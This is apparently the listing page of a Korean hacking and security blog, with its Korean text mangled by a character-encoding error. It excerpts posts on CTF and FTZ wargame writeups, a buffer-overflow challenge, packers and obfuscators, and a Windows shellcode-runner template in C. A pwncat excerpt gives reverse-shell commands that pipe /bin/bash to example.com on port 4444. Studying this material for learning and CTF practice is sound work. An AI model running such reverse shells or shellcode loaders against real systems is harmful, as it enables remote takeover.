728x90 ์ ์ฒด ๊ธ720 ์ด์ ๋ธ๋ฆฌ์ด - ๋ฆฌ๋ ์ค syscall๋ก open, read, write ์ฌ์ฉ ๋ฆฌ๋ ์ค ์ํคํ ์ฒ ํ์ธ ๋ช ๋ น์ด uname -a syscall ํ ์ด๋ธ https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86_64-64_bit Chromium OS Docs - Linux System Call Table Linux System Call Table These are the system call numbers (NR) and their corresponding symbolic names. These vary significantly across architectures/ABIs, both in mappings and in actual name. This is a quick reference for p.. 2023. 3. 24. ๋ฆฌ๋ฒ์ฑ - ์๋์ฐ ์์ฝ๋ ์คํ C์ธ์ด ์์ค #include #include int main(void){ char shellcode[] = {0x00,}; void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, shellcode, sizeof shellcode); ((void(*)())exec)(); return 0; } 2023. 3. 23. C/C++ - DLL ๋ง๋ค๊ธฐ, DLL ์ฌ์ฉํ๊ธฐ (GCC) my_dll.c (DLL ๋ง๋ค๊ธฐ) #include void func() { system("start www.google.com");} GCC DLL ๋น๋ gcc -shared my_dll.dll -o my_dll.c run.c (DLL ์ฌ์ฉํ๊ธฐ) #include #include typedef void(*dll_func)();int main(){ HINSTANCE hDLL = LoadLibrary("my_dll.dll"); if(hDLL == NULL){ printf("Failed to load DLL\n"); return 1; } dll_func func = (dll_func)GetProcAddress(hDLL, "func"); if(func ==.. 2023. 3. 23. ๋คํธ์ํฌ ๋ณด์ - Mullvad VPN ํฌํธํฌ์๋ฉ์ผ๋ก ์น ์๋ฒ ์ธ๋ถ์์ ์ ์ Mullvad VPN ์ฌ์ดํธ: ๊ณ์ > ์ฅ์น ํญ์์ ๋ด ์ฅ์น ํ์ธ ์ฃผ์: https://mullvad.net/ko/account/#/devices ๋ด ์ฅ์น์์ "ํฌํธ ์ถ๊ฐ" ํด๋ฆญ ํฌํธํฌ์๋ฉ ์ค์ ๋ฐฐ์ ๋ ํฌํธ ๋ฒํธ ํ์ธ ๋๋ผ-๋์-ํฌํธ๋ฒํธ ํ์์ด๋ฉฐ ๋ค์ ์ซ์ ๋ฒํธ๊ฐ ์ง์ ๋ฐ์ ๋ด ํฌํธ ๋ฒํธ์ด๋ค. Mullvad VPN ํ๋ก๊ทธ๋จ์์ ํฑ๋๋ฐํด(์ค์ ) ํด๋ฆญ "VPN ์ค์ " ํด๋ฆญ ํฐ๋ ํ๋กํ ์ฝ ํญ๋ชฉ์์ "OpenVPN"์ ์ ํ ๋ฐ๋์ VPN ์๋ฒ์ ์ฐ๊ฒฐ๋ ์์น๊ฐ ํฌํธํฌ์๋ฉ ํ์ด์ง์์ ์ค์ ํ ์์น๋ ์ผ์นํ๋์ง ํ์ธ Mullvad VPN ์ฌ์ดํธ์์ ํฌํธ ์ ์ ํ์ธํ๊ธฐ ์ฃผ์: https://mullvad.net/ko/check ์์ ์ IPv4 ์ฃผ์๋ฅผ ์ฐ์ ํ์ธ ๋ฐ๋ก ํ๋จ์ "ํฌํธ ํ์ธ" ํญ์ผ๋ก ๋ค์ด๊ฐ ๋ฐฉ๊ธ ์ ์ ํ์ธํ ํฌ.. 2023. 3. 19. ์๋์ฐ - ํ๋ก๊ทธ๋จ ํจํน ๋๊ตฌ(UPX) UPX(Ultimate Packer for eXecutables)๋ ์คํ ํ์ผ์ ํฌ๊ธฐ๋ฅผ ์ค์ด๋ ํ์ผ ํจํน ํ๋ก๊ทธ๋จ์ ๋๋ค. https://upx.github.io/ UPX: the Ultimate Packer for eXecutables - Homepage Welcome UPX is a free, secure, portable, extendable, high-performance executable packer for several executable formats. Introduction UPX is an advanced executable file compressor. UPX will typically reduce the file size of programs and DLLs by around 50%-.. 2023. 3. 18. TryHackMe - Simple CTF (2) Writeup 6๋ฒ ์ง๋ฌธ. ํ๋ํ ์ธ๋ถ ์ ๋ณด๋ก ์ด๋์์ ๋ก๊ทธ์ธํ ์ ์๋์?ํ๋ํ ๊ณ์ ์ผ๋ก ๋ค๋ฅธ ์๋น์ค ์ด๋์ ๋ก๊ทธ์ธ์ด ๊ฐ๋ฅํ๋๋ ์ง๋ฌธ ๊ฐ์๋ค. ์ฐ์ ์๊ณ ์๋ ๊ณ์ ์ mitch:secret์ด์์ผ๋ฉฐ ์น ์๋ฒ์ SSH์๋ ๋ก๊ทธ์ธ ๊ฐ๋ฅํ์ง ํ์ธํด ๋ณธ๋ค. nmap์ผ๋ก ์น ์๋ฒ์ ssh ํฌํธ ๋ฒํธ๋ฅผ ์ฐพ์์ค๋ค. (result: 2222/tcp) ssh ๋ก๊ทธ์ธ ๋จ๊ณ์์ ์น ์ฌ์ดํธ ๊ด๋ฆฌ์์ธ mitch ๊ณ์ ์ ๋๊ฐ์ด ์ ๋ ฅํ๋ ๋ก๊ทธ์ธ์ด ์ฑ๊ณตํ๋ค. 6๋ฒ ์ ๋ต์ "ssh" 7๋ฒ ์ง๋ฌธ. ์ฌ์ฉ์์ ํ๋๊ทธ๋ ๋ฌด์์ ๋๊น? ์ฐพ๋ ๊ฑด ๊ฐ๋จํ๋ค.์์ ๋ค์ด๊ฐ์๋ง์ ls๋ฅผ ์น๋ฉด user.txt๋ ํ์ผ์ด ํ๋ ์๋๋ฐ ๊ทธ ๋ด์ฉ๋ฌผ์ด ๋ฐ๋ก ํ๋๊ทธ์ด๋ค. 7๋ฒ ์ ๋ต์ "G00d j0b, keep up!" 8๋ฒ ์ง๋ฌธ. ํ ๋๋ ํฐ๋ฆฌ์ ๋ค๋ฅธ ์ฌ์ฉ์๊ฐ ์๋์?.. 2023. 3. 18. ๋คํธ์ํฌ ํดํน - pwncat ๋ฆฌ๋ฒ์ค์ ๋ช ๋ น์ด pip ์ค์น ๋ช ๋ น์ด pip install pwncat victim(ํด๋ผ์ด์ธํธ)์ด ๊ณต๊ฒฉ์(์๋ฒ) ์ ์์ ์ํ ์ค์น ๋ช ๋ น์ด sudo pip install pwncat-cs ์๋ ๊ณต๊ฒฉ์๊ฐ python3 -m pwncat ๋ช ๋ น์ด๋ฅผ ์ฐ๊ธฐ ์ํ ์ค์น ๋ช ๋ น์ด TCP Reverse shell(ํด๋ผ์ด์ธํธ) pwncat -e '/bin/bash' example.com 4444 pwncat -e '/bin/bash' example.com 4444 --reconn --reconn-wait 10 10์ด๋ง๋ค ์ฌ์ฐ๊ฒฐ ์๋ ๊ณต๊ฒฉ์ ๋ฆฌ๋ฒ์ค์ ์๋ฒ ์คํ python3 -m pwncat -lp 4444 pwncat ํ๋กฌํํธ ๋ช ๋ น์ด / ๋จ์ถํค sessions: ์ฐ๊ฒฐ๋ victim๋ค ํ์ธ sessions {ID}: ์ํธ์์ฉ ํ๋ ค๋ victi.. 2023. 3. 16. ํ์ด์ฌ - ์ฝ๋ ๋๋ ํ ๋ณํ ์ฌ์ดํธ(pyob.oxyry.com) https://pyob.oxyry.com/ Oxyry Python Obfuscator - The most reliable python obfuscator in the world Features Rename symbol names, includes variables, functions, classes, arguments, class private methods. The name replacer avoids a 1:1 mapping of cleartext names to obfuscated names, the same name may be converted to several different names within differen pyob.oxyry.com 2023. 3. 16. ์น ํดํน - ๋ฆฌ๋ฒ์ค ์ ๋ช ๋ น์ด ๋ชจ์ ์ฌ์ดํธ(revshells.com) https://www.revshells.com/ Online - Reverse Shell Generator Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs. www.revshells.com 2023. 3. 16. FTZ - level 9 hint ๋ค์์ /usr/bin/bof์ ์์ค์ด๋ค. #include #include #include main(){ char buf2[10]; char buf[10]; printf("It can be overflow : "); fgets(buf,40,stdin); if ( strncmp(buf2, "go", 2) == 0 ) { printf("Good Skill!\n"); setreuid( 3010, 3010 ); system("/bin/bash"); } } ์ด๋ฅผ ์ด์ฉํ์ฌ level10์ ๊ถํ์ ์ป์ด๋ผ. ๋ฒํผ ์ค๋ฒํ๋ก์ฐ์ ๊ดํ ๋ฌธ์ ์ด๋ค. fgets ํจ์๋ก ์ฌ์ฉ์๋ก๋ถํฐ ์ต๋ 40๋ฐ์ดํธ ํฌ๊ธฐ์ ์ ๋ ฅ์ ๋ฐ๊ณ ์๋ค. ๋ฌธ์ ๋ buf2์ buf ๋ณ์์ ์ฌ์ด์ฆ๋ 10 ๋ฐ์ ์๋๊ธฐ ๋๋ฌธ์ ๋ฒํผ๊ฐ ์ค๋ฒํ๋ก์ฐ ๋ผ์ ํ๋ก๊ทธ๋จ.. 2023. 3. 15. FTZ - level 8 with ChatGPT ์ค๋๋ง์ FTZ๋ฅผ ํ์ด๋ณด๊ธฐ๋ก ํ๋ค. ์ต๊ทผ์ ChatGPT์ ์ฌ๋ฏธ๊ฐ ๋ค๋ ค์ ๋ด๊ฐ ๋ง์ด ๋ฌด์งํ ์์คํ ํดํน์ ๊ด๋ จํ ์ง๋ฌธ๋ค์ ํ๋ฉด ์ฑ๋ด ์ธ๊ณต์ง๋ฅ์ด ์ดํดํ๊ธฐ ์ฌ์ด ๋ต๋ณ์ ํด์คฌ๋๋ฐ ๊ทธ ๊ณผ์ ์ ์์คํ ํดํน์ ํฅ๋ฏธ๊ฐ ๋ฌ์์ฌ๋ผ ๋ค์ ์ด์ด์ ํ์ด๋ณด๊ธฐ๋ก ํ ๊ฒ์ด๋ค. ์๋ฌดํผ level8์ ๋ก๊ทธ์ธํ์ฌ ํํธ๋ฅผ ์ดํด๋ณด๋ level9์ shadow ํ์ผ์ด ์ด๋๊ฐ์ ์จ๊ฒจ์ ธ ์๋ค๋ ๊ฒ๊ณผ ์ฌ์ด์ฆ๋ 2700์ด๋ ๋ด์ฉ์ด๋ค. shadow ํ์ผ์ด๋? shadow ํ์ผ์ ์ฌ์ฉ์ ๊ณ์ ์ ํจ์ค์๋๊ฐ ๋จ๋ฐฉํฅ ์ํธํ์ธ ํด์ ํจ์๋ฅผ ํตํด ์ํธํํ ์ํ๋ก ์ ์ฅ์ด ๋๋ ์์ฃผ ์ค์ํ ๋ค๋ค์ผ ํ๋ ํ์ผ์ด๋ค. /etc/shadow ํ์ผ์ ์ ์ฅ๋๋ค. ์ผ๋ฐ์ ์ผ๋ก ๋ฃจํธ ๊ถํ๋ง ์ด๋์ด ๊ฐ๋ฅํ๋ฉฐ, ์ผ๋ฐ ์ ์ ๋ ์ด์ด๋ณผ ์ ์๋ค. ์ฌ์ฉ์๊ฐ ๋ก๊ทธ์ธ์ ํ ๋๋ ์๋์ฐ ํ์ผ์ .. 2023. 3. 15. ๋จธ์ ๋ฌ๋ - ๋จธ์ ๋ฌ๋ ์ฝ๊ฒ ๋ฐฐ์ฐ๊ธฐ ์์: https://youtu.be/432p379XXMw ์๋ฌธ: https://medium.com/@calebkaiser/dont-learn-machine-learning-8af3cf946214 Don’t learn machine learning Learn how to build software with ML models medium.com ์์ฝ: ๋จธ์ ๋ฌ๋์ ๋ฐฐ์ฐ๊ธฐ ์ํด ๋ฐ๋ฐ์ธ ๋ฐ์ดํฐ ๋ถ์ ๊ตฌ์กฐ๋ถํฐ ๊ณต๋ถํ๋ ๊ฒ์ ๋ง์น ์์ฉ ํ๋ก๊ทธ๋จ ๊ฐ๋ฐ์๊ฐ ๋ก์ฐ ๋ญ๊ท์ง์ธ ์ด์ ๋ธ๋ฆฌ ์ธ์ด๋ฅผ ๋ฐฐ์ฐ๋ ๊ฒ๊ณผ ๋น์ทํ๋ค. ์ํํธ์จ์ด ๊ฐ๋ฐ์ ์ํ ๋จธ์ ๋ฌ๋์ ๋ฐฐ์ฐ๊ธฐ ์ํด์๋ ํ-๋ค์ด ๋ฐฉ์๊ณผ ์คํ์ ํตํ ํ์ต ๋ฐฉ๋ฒ์ ์ฌ์ฉํ๋ผ chatGPT, YOLO ๊ฐ์ ํ๋ก์ ํธ๋ฅผ ์ฌ์ฉํ๋ ๊ฒ๋ ์ข์ ์๋จ์ด๋ค. 2023. 3. 13. ์ด์ 1 ยทยทยท 18 19 20 21 22 23 24 ยทยทยท 60 ๋ค์ 728x90
HackLog
